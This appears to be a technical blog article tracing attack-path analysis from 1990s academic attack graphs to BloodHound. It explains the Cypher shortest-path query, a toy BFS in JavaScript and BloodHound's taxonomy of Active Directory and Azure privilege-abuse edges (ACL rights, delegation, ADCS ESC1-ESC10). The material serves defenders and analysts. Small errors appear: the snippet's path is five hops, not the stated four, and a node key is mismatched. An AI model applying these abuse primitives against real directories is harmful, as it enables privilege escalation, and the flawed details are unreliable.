&lt;p&gt;In September 1998, two researchers at Sandia National Laboratories presented a paper titled &lt;em&gt;A Graph-Based System for Network-Vulnerability Analysis&lt;/em&gt; at the New Security Paradigms Workshop in Charlottesville, Virginia. The authors, Cynthia Phillips and Laura Painton Swiler, proposed that a network&apos;s worst-case attack was a &lt;em&gt;graph traversal&lt;/em&gt; problem [@phillips-swiler-1998-nspw]. Nodes encoded network states (the set of attacker privileges across the set of hosts). Edges encoded atomic attack steps (an exploit that, given prerequisite privileges, granted new ones). The shortest path from &quot;attacker outside the network&quot; to &quot;attacker has goal asset&quot; was the worst-case attack.&lt;/p&gt;
&lt;p&gt;Phillips and Swiler observed in a now-canonical sentence that &lt;em&gt;&quot;the security of a network is more than the sum of the security of its hosts.&quot;&lt;/em&gt; It is the conceptual ancestor of every attack-path tool that followed.&lt;/p&gt;
&lt;p&gt;Four years later, at IEEE Symposium on Security and Privacy 2002, Oleg Sheyner (then a CMU PhD student) along with Joshua Haines and Richard Lippmann (MIT Lincoln Lab), Somesh Jha (Wisconsin), and Jeannette Wing (CMU) made the construction automatic [@sheyner-et-al-2002-attack-graphs]. They encoded the network and attacker model as an NuSMV model-checker specification, treated the negation of the security goal as a temporal-logic property, and let the model checker generate every counterexample. The union of counterexamples was the attack graph.&lt;/p&gt;
&lt;p&gt;They also proved that the &lt;em&gt;minimum&lt;/em&gt; set of edges whose removal disconnects the attacker from the goal is NP-hard, but admits an O(log n) approximation -- the first asymptotic bound for the defender-hardening problem.&lt;/p&gt;
&lt;p&gt;Sheyner&apos;s companion 2004 thesis -- &lt;em&gt;Scenario Graphs and Attack Graphs&lt;/em&gt;, CMU-CS-04-122 -- remains the most readable book-length treatment of the academic-attack-graph generation [@sheyner-2004-thesis].&lt;/p&gt;
&lt;p&gt;By 2005 the academic line had a scale solution. Xinming Ou, Sudhakar Govindavajhala, and Andrew Appel at Princeton released &lt;strong&gt;MulVAL&lt;/strong&gt; at USENIX Security 2005 [@mulval-usenix-2005], encoding network state and attacker rules as Datalog facts and running them through XSB Prolog. From the paper&apos;s abstract: &lt;em&gt;&quot;Once the information is collected, the analysis can be performed in seconds for networks with thousands of machines.&quot;&lt;/em&gt; NetSPA at MIT Lincoln Lab (2006) and TVA / CAULDRON at George Mason (2003 to 2005) achieved similar scale through different mechanisms.&lt;/p&gt;
&lt;p&gt;In parallel, on the Windows operator side, Sean Metcalf was running adsecurity.org and documenting AD misconfiguration patterns one writeup at a time [@adsecurity-org]. Microsoft was rolling out its Enhanced Security Administrative Environment (&quot;Red Forest&quot;) tiered-administration model -- the predecessor that the Enterprise Access Model later replaced [@ms-enterprise-access-model] -- which was implicitly graph-aware (the entire ESAE prescription is a tier diagram) but never exposed the tier graph as a queryable structure. ESAE was a deployment blueprint, not a tool.&lt;/p&gt;

gantt
    title Three parallel tracks converging on the attack-path graph
    dateFormat YYYY
    axisFormat %Y&lt;pre&gt;&lt;code&gt;section Academic CVE line
Phillips and Swiler NSPW   :a1, 1998, 1999
Sheyner et al. IEEE SP     :a2, 2002, 2003
MulVAL USENIX              :a3, 2005, 2006
NetSPA TVA                 :a4, 2006, 2008

section Windows operator line
adsecurity.org writeups    :b1, 2014, 2016
PowerView                  :b2, 2014, 2016
Lambert essay              :milestone, b3, 2015-04-26, 1d
BloodHound DEF CON 24      :b4, 2016, 2018
AzureHound BloodHound 4.0  :b5, 2020, 2023
BloodHound CE 5.0          :b6, 2023, 2024
ADCS attack paths          :b7, 2024, 2025
Butterfly v6.3             :b8, 2024, 2026
OpenGraph v8.0             :b9, 2025, 2026

section Microsoft defender stack
ESAE Red Forest blueprint  :c1, 2015, 2018
Azure ATP LMPs preview     :c2, 2018, 2020
Defender CSPM attack paths :c3, 2022, 2024
MSEM GA                    :milestone, c4, 2024-11-19, 1d
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The April 2015 essay sat between the two tracks. Lambert was inside Microsoft. He had read the academic literature. He worked next to the threat-intelligence teams who watched real intrusions unfold. The essay was the moment the two communities&apos; vocabularies met. The diagnosis was right. The cure was sixteen months away. It would not come from Microsoft, and it would not come from academia. It would come from a red-team consultancy and a free graph database, and it would debut on a Saturday in August at a hacker convention in Las Vegas.&lt;/p&gt;
&lt;h2&gt;4. Defenders evaluating Active Directory as a list of ACLs&lt;/h2&gt;
&lt;p&gt;If you were a Microsoft-aligned AD security engineer in 2013, your job was to read ACLs. One object at a time. Down a list.&lt;/p&gt;
&lt;p&gt;The mainstream defender toolchain of the era was, almost without exception, list-shaped. Microsoft shipped &lt;code&gt;dsacls.exe&lt;/code&gt; and PowerShell&apos;s &lt;code&gt;Get-Acl&lt;/code&gt;; both produced row-oriented output that an analyst read sequentially. The commercial AD-audit market -- NetWrix Auditor [@netwrix-auditor], ManageEngine ADAudit Plus [@manageengine-adaudit-plus], Quest ActiveRoles [@quest-activeroles], and others -- produced HTML reports with one section per directory object, one row per non-default Access Control Entry, and severity classifications based on a fixed checklist of &quot;dangerous rights&quot; (&lt;code&gt;GenericAll&lt;/code&gt;, &lt;code&gt;WriteDacl&lt;/code&gt;, &lt;code&gt;WriteOwner&lt;/code&gt;, and a handful of others).&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s own &lt;em&gt;Best Practices for Securing Active Directory&lt;/em&gt; document codified this approach. Its central recommendation was &lt;em&gt;per-object delegation review&lt;/em&gt;: walk the directory tree, evaluate each object&apos;s ACL against a hardening checklist, and remediate non-default ACEs that exceed the documented privilege model [@ms-best-practices-ad]. The document is excellent at what it sets out to do. What it does not do -- because the format does not permit it -- is compose multi-hop reachability.&lt;/p&gt;
&lt;p&gt;This was the failure mode Lambert described. A help-desk operator with &lt;code&gt;ForceChangePassword&lt;/code&gt; on a junior service account appears as one row in the audit. The junior service account&apos;s &lt;code&gt;MemberOf Server Operators&lt;/code&gt; membership appears in a different report section. The &lt;code&gt;Server Operators&lt;/code&gt; group&apos;s logon rights on the Domain Controller appear in the Domain Controller&apos;s own report. Three findings in three places, with no machinery to compose them. The data model cannot represent the question.&lt;/p&gt;

A reader trained on Phillips and Swiler, Sheyner et al., MulVAL, NetSPA, and TVA might object that *the field already had* graph-based attack-path analysis a decade before BloodHound. True -- in academia. The academic line solved the scale problem (MulVAL: *&quot;seconds for networks with thousands of machines&quot;*) but spoke the wrong vocabulary. Its atomic attack step was a CVE exploit -- a buffer overflow, a format-string bug, a daemon remote code execution. The dominant AD attack primitive is not a CVE. A user with `WriteDacl` on a group is not exploiting any vulnerability; they are using the system as designed. None of MulVAL, NetSPA, or TVA developed an AD-style privilege-graph input format, and the operator community never adopted them. The academic line was substrate-mismatched and delivered as research-PDF tarballs rather than as `git clone`-able tools.
&lt;p&gt;Two communities, both wrong in different ways. The academic one had the right algorithm with the wrong substrate. The operator one had the right substrate with no algorithm at all. The fix was to fuse them. That happened on August 6, 2016.&lt;/p&gt;
&lt;h2&gt;5. The breakthrough -- BloodHound and Six Degrees of Domain Admin&lt;/h2&gt;
&lt;p&gt;Saturday, August 6, 2016. 1:00 PM. DEF CON 24, Track 2, Paris and Bally&apos;s hotel-casinos in Las Vegas [@defcon-24-archive]. Three speakers from Veris Group&apos;s adaptive threat division step on stage: Andy Robbins, Rohan Vazarkar, Will Schroeder. The talk is titled &lt;em&gt;Six Degrees of Domain Admin: Using Graph Theory to Accelerate Red Team Operations&lt;/em&gt; [@defcon24-bloodhound-slides]. The Veris Group team would spin out as SpecterOps the following year, but the August 2016 attribution -- Robbins (&lt;code&gt;@_wald0&lt;/code&gt;), Vazarkar (&lt;code&gt;@CptJesus&lt;/code&gt;), and Schroeder (&lt;code&gt;@harmj0y&lt;/code&gt;) -- is the canonical one [@bloodhound-legacy-repo].&lt;/p&gt;
&lt;p&gt;The talk demonstrated three design decisions that in retrospect look obvious and at the time were not.&lt;/p&gt;
&lt;p&gt;First, &lt;strong&gt;model Active Directory as a directed property graph&lt;/strong&gt;. Nodes are typed security principals (User, Computer, Group, Domain, OU, GPO). Edges are typed privilege relationships (MemberOf, AdminTo, HasSession, GenericAll, GenericWrite, WriteDacl, ForceChangePassword, and others). This was Lambert&apos;s framing made concrete: every ACE that grants a dangerous right becomes an edge from the trustee to the target.&lt;/p&gt;
&lt;p&gt;Second, &lt;strong&gt;reuse Neo4j as the engine&lt;/strong&gt;. Do not build a custom graph database; piggyback on Cypher&apos;s pattern-matching query language. The cost of building a path-finding engine from scratch was non-trivial; the cost of standing up Neo4j was a single Docker container.&lt;/p&gt;
&lt;p&gt;Third, &lt;strong&gt;ship a collector that emits typed JSON edges, not raw NTSecurityDescriptors&lt;/strong&gt;. The collector&apos;s value is the &lt;em&gt;interpretation&lt;/em&gt; of an ACE as a graph edge -- the mapping from a binary security descriptor to the typed edge that says &quot;trustee X has GenericWrite on object Y&quot; is the hard part, and a defender re-creating that mapping per query would lose. SharpHound (initially &lt;code&gt;SharpHound.ps1&lt;/code&gt;, then a C# binary) does the interpretation once at collection time and writes the edges to disk [@bloodhound-ce-repo].&lt;/p&gt;

SharpHound&apos;s enumeration calls are visibly descended from PowerView. The November 2020 SpecterOps blog announcing BloodHound 4.0 acknowledges the lineage explicitly, naming Schroeder&apos;s joint authorship of both projects and crediting PowerView as the data-collection precursor [@specterops-2020-bloodhound-4]. PowerView&apos;s August 2014 release was the substrate that made BloodHound&apos;s August 2016 synthesis possible. The chain is unbroken: enumeration in 2014, framing in April 2015, graph synthesis in August 2016.
&lt;p&gt;The five-day-of-whiteboard-work figure comes from the SpecterOps team&apos;s own internal benchmark from the original DEF CON 24 talk. The 200 ms query latency is the typical 2024 figure on a mid-size enterprise forest of roughly 10^5 nodes and 10^6 edges, retained as the company&apos;s marketing framing across subsequent blog posts.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; BloodHound&apos;s breakthrough was neither an algorithm nor an architecture. It was the decision to &lt;em&gt;interpret&lt;/em&gt; Active Directory&apos;s access-control data as a typed graph and ship that interpretation as a tool the operator community could actually run.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Crucially, the choice to use Neo4j&apos;s free &lt;code&gt;shortestPath()&lt;/code&gt; function rather than building a custom path-finder was a &lt;em&gt;delivery&lt;/em&gt; decision as much as a &lt;em&gt;technical&lt;/em&gt; one. Neo4j already did breadth-first shortest paths. The team did not need to invent anything. The hard work was in the edge taxonomy and the collector, not in the graph database.&lt;/p&gt;
&lt;p&gt;The talk made a promise the rest of the article must now cash: that there is a real algorithm under the hood, that the algorithm has a name, and that the name is not Dijkstra.&lt;/p&gt;
&lt;h2&gt;6. The algorithmic core -- property graphs, Cypher, and shortest paths&lt;/h2&gt;
&lt;p&gt;If you have never written a Cypher query in your life, the next ninety seconds is the entirety of the syntax you need.&lt;/p&gt;

A graph in which both nodes and edges are typed and can carry key-value properties. A node might have type `User` and properties `name=&apos;BOB@CORP.LOCAL&apos;`, `enabled=true`, `pwdlastset=1719234234`. An edge might have type `GenericWrite` and properties `source=&apos;ACE&apos;`, `isacl=true`. This is the data model Neo4j implements and the model BloodHound uses.
&lt;p&gt;A Cypher pattern is a parenthesised node, a bracketed edge, and a parenthesised node, with arrows showing direction. &lt;code&gt;(u:User)-[:MemberOf]-&amp;gt;(g:Group)&lt;/code&gt; reads &quot;find a node &lt;code&gt;u&lt;/code&gt; of type User connected by a MemberOf edge to a node &lt;code&gt;g&lt;/code&gt; of type Group.&quot; A full query has four parts: &lt;code&gt;MATCH&lt;/code&gt; for the pattern, optional &lt;code&gt;WHERE&lt;/code&gt; for filters, &lt;code&gt;RETURN&lt;/code&gt; for the output. That&apos;s it.Cypher patterns visually mimic ASCII graph drawings: parentheses are nodes, square brackets are edges, and the arrow direction matches the edge direction. The syntax was deliberately designed to look like the diagram you would sketch on a whiteboard.&lt;/p&gt;

The pattern-matching query language originally created for the Neo4j graph database. Cypher&apos;s syntax is declarative: you describe the shape of the data you want, and the engine plans the traversal. Since April 2024 Cypher has been the basis of the ISO/IEC 39075:2024 GQL standard -- the first ISO-standardised graph query language [@iso-39075-2024-gql] [@opencypher-home].
&lt;p&gt;Here is the canonical BloodHound query, with annotations:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-cypher&quot;&gt;MATCH p = shortestPath(
  (u:User {name:&apos;BOB@CORP.LOCAL&apos;})       // start node: Bob
    -[*1..]-&amp;gt;                            // any number of typed edges
  (g:Group {name:&apos;DOMAIN ADMINS@CORP.LOCAL&apos;})  // end node: Domain Admins
)
RETURN p
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The &lt;code&gt;shortestPath()&lt;/code&gt; wrapper tells Neo4j to short-circuit at the first solution. The variable-length quantifier &lt;code&gt;[*1..]&lt;/code&gt; says &quot;one or more edges of any type.&quot; The &lt;code&gt;p =&lt;/code&gt; binds the entire matched path to the variable &lt;code&gt;p&lt;/code&gt;, which the &lt;code&gt;RETURN&lt;/code&gt; then emits as a sequence of node-edge-node triples that the BloodHound frontend renders as an SVG.&lt;/p&gt;
&lt;p&gt;What does &lt;code&gt;shortestPath()&lt;/code&gt; actually run? Here is where the misconception that BloodHound uses Dijkstra needs to die. The current Neo4j Cypher manual is explicit that &lt;code&gt;shortestPath()&lt;/code&gt; runs an unweighted &lt;strong&gt;bidirectional traversal&lt;/strong&gt; -- BFS in the classical sense -- between the source and target nodes [@neo4j-cypher-shortest-paths]. Not Dijkstra. Not A*. BFS.&lt;/p&gt;

A graph-traversal algorithm that explores all nodes at the current depth before proceeding to the next depth. Starting from the source, it visits all 1-hop neighbours, then all 2-hop neighbours, and so on. For unweighted graphs, BFS is guaranteed to find a shortest path (in number of edges) the first time it reaches the target. Worst-case time is O(V + E) where V is the node count and E is the edge count -- the trivial information-theoretic lower bound for any algorithm that must read the input.
&lt;p&gt;Cypher does support weighted shortest paths via the Neo4j Graph Data Science library, but the BloodHound CE distribution does not enable it. There is no natural cost metric on Active Directory privilege edges in 2026; every edge is treated as one hop.&lt;/p&gt;
&lt;p&gt;Why BFS rather than Dijkstra? Dijkstra is BFS&apos;s generalisation to weighted graphs. If your edges have natural costs -- road distances, link latencies, dollar prices -- Dijkstra (with a Fibonacci heap, $O(E + V\log V)$) gives you shortest paths under that cost metric. Active Directory privilege edges do not have a natural cost metric. &lt;code&gt;MemberOf&lt;/code&gt;, &lt;code&gt;GenericAll&lt;/code&gt;, and &lt;code&gt;CanRDP&lt;/code&gt; are all &quot;the attacker can take this step.&quot; Some are easier than others, but quantifying &lt;em&gt;how much&lt;/em&gt; easier is itself an unsolved problem (see Section 11). Treating every edge as one hop is the load-bearing simplification that makes the model tractable.&lt;/p&gt;

Of a binary relation R: the relation R+ that contains the pair (a, c) whenever there is a chain a R b R ... R c. For a graph, the transitive closure tells you, for every pair of nodes, whether one is reachable from the other. BloodHound&apos;s `shortestPath()` queries can be thought of as on-demand evaluation of the transitive closure restricted to one source-target pair.
&lt;p&gt;The per-query complexity is $O(V + E)$, the standard BFS bound from any algorithms textbook. On a mid-size enterprise forest -- roughly 10^5 nodes and 10^6 edges -- a single user-to-group shortest path returns in sub-second wall-clock time.&lt;/p&gt;
&lt;p&gt;The variable-length quantifier &lt;code&gt;[*1..N]&lt;/code&gt; for general path enumeration is a different matter. Cyclic graphs admit exponentially many paths in N, and Neo4j&apos;s documentation explicitly warns that quantified path patterns can return exponentially many results in the worst case [@neo4j-cypher-variable-length]. The &lt;code&gt;shortestPath()&lt;/code&gt; short-circuit avoids this by returning on the first hit; &lt;code&gt;allShortestPaths()&lt;/code&gt; enumerates only paths tied for shortest; unbounded enumeration is intractable on any non-trivial graph.&lt;/p&gt;
&lt;p&gt;A concrete demonstration is in order. The runnable snippet below is a 35-line implementation of unweighted BFS over a six-node toy graph. It returns the shortest path from a &lt;code&gt;helpdesk&lt;/code&gt; user to the &lt;code&gt;domain-admin&lt;/code&gt; group. This is, structurally, the same algorithm Neo4j&apos;s &lt;code&gt;shortestPath()&lt;/code&gt; runs. The numerical answer (&quot;path of length 4&quot;) is the same number BloodHound would report on the same graph.&lt;/p&gt;
&lt;p&gt;{`
// Edges modelled as a typed adjacency list.
const edges = {
  helpdesk:        [{ to: &apos;carol&apos;,          via: &apos;ForceChangePassword&apos; }],
  carol:           [{ to: &apos;serverops&apos;,      via: &apos;MemberOf&apos; }],
  serverops:       [{ to: &apos;dc01&apos;,           via: &apos;CanRDP&apos; }],
  dc01:            [{ to: &apos;krbtgt&apos;,         via: &apos;DCSync&apos; }],
  krbtgt:          [{ to: &apos;domain-admin&apos;,   via: &apos;GoldenTicket&apos; }],
  domain_admin:    []
};&lt;/p&gt;
&lt;p&gt;function shortestPath(start, goal) {
  const queue = [[start]];           // queue holds candidate paths
  const seen  = new Set([start]);    // each node enqueued at most once&lt;/p&gt;
&lt;p&gt;  while (queue.length) {
    const path = queue.shift();      // BFS = FIFO
    const node = path[path.length - 1];
    if (node === goal) return path;
    for (const e of (edges[node] || [])) {
      if (!seen.has(e.to)) {
        seen.add(e.to);
        queue.push([...path, e.to]);
      }
    }
  }
  return null;                       // unreachable
}&lt;/p&gt;
&lt;p&gt;const path = shortestPath(&apos;helpdesk&apos;, &apos;domain-admin&apos;);
console.log(&apos;Path:&apos;, path.join(&apos; -&amp;gt; &apos;));
console.log(&apos;Length:&apos;, path.length - 1, &apos;hops&apos;);
`}&lt;/p&gt;
&lt;p&gt;The algorithm fits on a single screen. The hard work of BloodHound is not in this loop. The hard work is in deciding &lt;em&gt;which edges to insert into the graph in the first place&lt;/em&gt;. That decision -- the edge taxonomy -- is what makes BloodHound a security tool rather than a graph-database demo.&lt;/p&gt;

sequenceDiagram
    participant Client as Cypher client
    participant Planner as Cypher planner
    participant Engine as BFS engine
    participant Graph as Property graph
    Client-&amp;gt;&amp;gt;Planner: MATCH shortestPath(u to g)
    Planner-&amp;gt;&amp;gt;Engine: plan(start=u, end=g, bidirectional=true)
    Engine-&amp;gt;&amp;gt;Graph: expand 1-hop frontier from u
    Engine-&amp;gt;&amp;gt;Graph: expand 1-hop frontier from g
    Graph--&amp;gt;&amp;gt;Engine: neighbours of u, neighbours of g
    Engine-&amp;gt;&amp;gt;Graph: expand 2-hop frontier (both sides)
    Engine-&amp;gt;&amp;gt;Graph: expand 3-hop frontier (both sides)
    Graph--&amp;gt;&amp;gt;Engine: frontiers intersect at node m
    Engine--&amp;gt;&amp;gt;Planner: reconstruct path u to m to g
    Planner--&amp;gt;&amp;gt;Client: return path
&lt;h2&gt;7. The edge taxonomy -- what Active Directory actually looks like as a graph&lt;/h2&gt;
&lt;p&gt;The BloodHound graph is not &lt;em&gt;every privilege relationship in Active Directory.&lt;/em&gt; It is the set of relationships that the SpecterOps team has decided -- by iterative discovery, often in response to specific community-reported abuse primitives -- to model. The taxonomy has grown roughly monotonically since 2016; the rate has accelerated since the BloodHound CE 5.0 reboot in August 2023 [@specterops-2023-bloodhound-ce].&lt;/p&gt;
&lt;p&gt;Eight families dominate the 2026 graph. They map, family by family, onto the substrates of a modern hybrid enterprise.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;1. Group membership.&lt;/strong&gt; &lt;code&gt;MemberOf&lt;/code&gt; is the simplest edge. Cypher&apos;s variable-length quantifier (&lt;code&gt;[:MemberOf*1..]&lt;/code&gt;) walks transitive memberships in one expression, which is why nested-group reachability is a one-liner.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;2. ACL write-equivalents.&lt;/strong&gt; &lt;code&gt;GenericAll&lt;/code&gt;, &lt;code&gt;GenericWrite&lt;/code&gt;, &lt;code&gt;WriteDacl&lt;/code&gt;, &lt;code&gt;WriteOwner&lt;/code&gt;, &lt;code&gt;Owns&lt;/code&gt;, &lt;code&gt;AllExtendedRights&lt;/code&gt;, &lt;code&gt;ForceChangePassword&lt;/code&gt;, &lt;code&gt;AddSelf&lt;/code&gt;, &lt;code&gt;AddMember&lt;/code&gt;, and &lt;code&gt;AddKeyCredentialLink&lt;/code&gt; (the shadow-credentials primitive). Each names a specific dangerous-right pattern on a directory object&apos;s security descriptor. SharpHound&apos;s interpreter scans the &lt;code&gt;nTSecurityDescriptor&lt;/code&gt; attribute and emits one typed edge per matching ACE.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;3. Sessions.&lt;/strong&gt; &lt;code&gt;HasSession&lt;/code&gt; is the dynamic edge that goes stale fastest. SharpHound enumerates active sessions via &lt;code&gt;NetSessionEnum&lt;/code&gt; and &lt;code&gt;SAMR&lt;/code&gt;; the resulting edges describe &quot;user U is currently logged into computer C.&quot; The graph is whatever the most recent collection captured.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;4. Remote execution rights.&lt;/strong&gt; &lt;code&gt;AdminTo&lt;/code&gt;, &lt;code&gt;CanRDP&lt;/code&gt;, &lt;code&gt;ExecuteDCOM&lt;/code&gt;, &lt;code&gt;CanPSRemote&lt;/code&gt;, &lt;code&gt;SQLAdmin&lt;/code&gt;. Each describes a code-execution primitive granted to a principal on a computer object.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;5. &lt;a href=&quot;https://paragmali.com/blog/kerberos-in-windows-the-other-half-of-ntlmless/&quot; rel=&quot;noopener&quot;&gt;Kerberos delegation&lt;/a&gt;.&lt;/strong&gt; &lt;code&gt;AllowedToDelegate&lt;/code&gt; (constrained delegation), &lt;code&gt;AllowedToAct&lt;/code&gt; (resource-based constrained delegation, via &lt;code&gt;msDS-AllowedToActOnBehalfOfOtherIdentity&lt;/code&gt;), unconstrained delegation surfaced as node properties on Computer objects, and -- from BloodHound CE v6.3 in December 2024 [@bloodhound-v6-3-release] -- a &lt;code&gt;CoerceToTGT&lt;/code&gt; edge that replaces the older &lt;code&gt;UnconstrainedDelegation&lt;/code&gt; finding for BHE customers.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;6. &lt;a href=&quot;https://paragmali.com/blog/certified-pre-owned-ad-cs-and-active-directorys-second-trust/&quot; rel=&quot;noopener&quot;&gt;ADCS&lt;/a&gt; edges (early-access January 2024).&lt;/strong&gt; &lt;code&gt;ADCSESC1&lt;/code&gt; through &lt;code&gt;ADCSESC10&lt;/code&gt;, plus the &lt;strong&gt;&lt;code&gt;CoerceAndRelayNTLMToADCS&lt;/code&gt; edge for ESC8&lt;/strong&gt; [@specterops-2024-adcs-bloodhound]. These edges land in BloodHound roughly thirty months after Will Schroeder and Lee Christensen first published the ESC1 to ESC8 catalog in &lt;em&gt;Certified Pre-Owned: Abusing Active Directory Certificate Services&lt;/em&gt; [@specterops-2021-certified-preowned]. Each ADCS edge in BloodHound is the most complex in the taxonomy because each is composed from multiple raw facts (see the traversable / non-traversable discussion below).&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;7. Azure / Entra ID edges&lt;/strong&gt; (via AzureHound, November 20, 2020) [@specterops-2020-bloodhound-4]. &lt;code&gt;AZGlobalAdmin&lt;/code&gt;, &lt;code&gt;AZRoleAssignment&lt;/code&gt;, &lt;code&gt;AZContains&lt;/code&gt;, &lt;code&gt;AZOwns&lt;/code&gt;, &lt;code&gt;AZUserAccessAdministrator&lt;/code&gt;, &lt;code&gt;AZAddSecret&lt;/code&gt;, &lt;code&gt;AZMGAddOwner&lt;/code&gt;, plus AzureRM-side resource roles. Microsoft Entra &lt;a href=&quot;https://paragmali.com/blog/privileged-identity-management-how-a-two-state-role-assignme/&quot; rel=&quot;noopener&quot;&gt;Privileged Identity Management (PIM)&lt;/a&gt; role coverage was added in BloodHound v8.0 in July 2025 [@specterops-2025-opengraph].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;8. OpenGraph custom edges (v8.0, July 29, 2025).&lt;/strong&gt; User-defined edges for arbitrary substrates: GitHub, Snowflake, Microsoft SQL Server, ServiceNow, Tailscale, Duo. The schema is intentionally generic so that a community contributor can ship edges for any system whose privilege model can be drawn as a graph [@bloodhound-opengraph-library].&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Family&lt;/th&gt;
&lt;th&gt;Representative edges&lt;/th&gt;
&lt;th&gt;Underlying AD mechanism&lt;/th&gt;
&lt;th&gt;What it gives the attacker&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Group membership&lt;/td&gt;
&lt;td&gt;&lt;code&gt;MemberOf&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;member&lt;/code&gt; attribute on group object&lt;/td&gt;
&lt;td&gt;Inherits all permissions held by the group&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ACL write-equivalents&lt;/td&gt;
&lt;td&gt;&lt;code&gt;GenericAll&lt;/code&gt;, &lt;code&gt;GenericWrite&lt;/code&gt;, &lt;code&gt;WriteDacl&lt;/code&gt;, &lt;code&gt;WriteOwner&lt;/code&gt;, &lt;code&gt;ForceChangePassword&lt;/code&gt;, &lt;code&gt;AddKeyCredentialLink&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Specific dangerous-right ACE patterns in &lt;code&gt;nTSecurityDescriptor&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Take control of the target principal (reset password, modify object, plant shadow credentials)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Sessions&lt;/td&gt;
&lt;td&gt;&lt;code&gt;HasSession&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;NetSessionEnum&lt;/code&gt; and &lt;code&gt;SAMR&lt;/code&gt; enumeration on member computers&lt;/td&gt;
&lt;td&gt;Pivot via credential theft from the logged-in user&apos;s memory&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Remote execution&lt;/td&gt;
&lt;td&gt;&lt;code&gt;AdminTo&lt;/code&gt;, &lt;code&gt;CanRDP&lt;/code&gt;, &lt;code&gt;ExecuteDCOM&lt;/code&gt;, &lt;code&gt;CanPSRemote&lt;/code&gt;, &lt;code&gt;SQLAdmin&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Local-admin membership, RDP / DCOM / WinRM / SQL group rights&lt;/td&gt;
&lt;td&gt;Run arbitrary code as the target principal on the target host&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Kerberos delegation&lt;/td&gt;
&lt;td&gt;&lt;code&gt;AllowedToDelegate&lt;/code&gt;, &lt;code&gt;AllowedToAct&lt;/code&gt;, &lt;code&gt;CoerceToTGT&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Constrained and resource-based delegation attributes&lt;/td&gt;
&lt;td&gt;Forge service tickets and impersonate other accounts&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ADCS composite&lt;/td&gt;
&lt;td&gt;&lt;code&gt;ADCSESC1&lt;/code&gt; through &lt;code&gt;ADCSESC10&lt;/code&gt;, &lt;code&gt;CoerceAndRelayNTLMToADCS&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Certificate template misconfigurations plus CA trust plus enrollment ACEs&lt;/td&gt;
&lt;td&gt;Obtain a certificate usable for authentication as a privileged account&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Azure / Entra&lt;/td&gt;
&lt;td&gt;&lt;code&gt;AZGlobalAdmin&lt;/code&gt;, &lt;code&gt;AZRoleAssignment&lt;/code&gt;, &lt;code&gt;AZAddSecret&lt;/code&gt;, &lt;code&gt;AZOwns&lt;/code&gt;, &lt;code&gt;AZMGAddOwner&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Entra role assignments, AzureRM RBAC&lt;/td&gt;
&lt;td&gt;Cross the on-prem to cloud boundary; pivot via tenant or subscription privileges&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;OpenGraph&lt;/td&gt;
&lt;td&gt;User-defined&lt;/td&gt;
&lt;td&gt;Any substrate the contributor models&lt;/td&gt;
&lt;td&gt;Anything the contributed schema encodes&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The ADCS family deserves a closer look because it introduced an important new modelling vocabulary.&lt;/p&gt;

A *traversable* edge is one the shortest-path query can step through directly: `MemberOf`, `ForceChangePassword`, `CanRDP`. A *non-traversable* edge is a precondition relationship that is only exploitable when several others appear together. A certificate template&apos;s `Enroll` ACE is non-traversable on its own; combined with eight other facts about the template, the issuing CA, and the domain&apos;s trust posture, it composes into `ADCSESC1`. The post-processor scans for the full pattern and synthesises a single traversable edge that the BFS can then treat as one hop [@specterops-2024-adcs-bloodhound].
&lt;p&gt;For ESC1 the pattern has nine numbered prerequisites: six template and CA requirements, two enterprise-CA trust facts, and one implicit constraint. None of the nine raw facts is exploitable in isolation. All nine together are. The post-processor&apos;s job is to walk the candidate sub-graphs, check every requirement, and write the composed &lt;code&gt;ADCSESC1&lt;/code&gt; edge when the pattern holds.&lt;/p&gt;
&lt;p&gt;This is a non-trivial graph-modelling contribution because it gives the field a vocabulary for &quot;an edge that is real only as a join over several facts.&quot; It also generalises beyond ADCS: any future attack primitive composed from a fixed pattern of raw facts can be modelled the same way.&lt;/p&gt;
&lt;p&gt;ESC8 -- the &lt;a href=&quot;https://paragmali.com/blog/ntlmless-the-death-of-ntlm-in-windows/&quot; rel=&quot;noopener&quot;&gt;NTLM relay&lt;/a&gt; primitive against an HTTP-enrollment certificate authority -- is the most delicate case, and the one most commonly mis-modelled in early secondary writeups.&lt;/p&gt;
&lt;blockquote&gt;
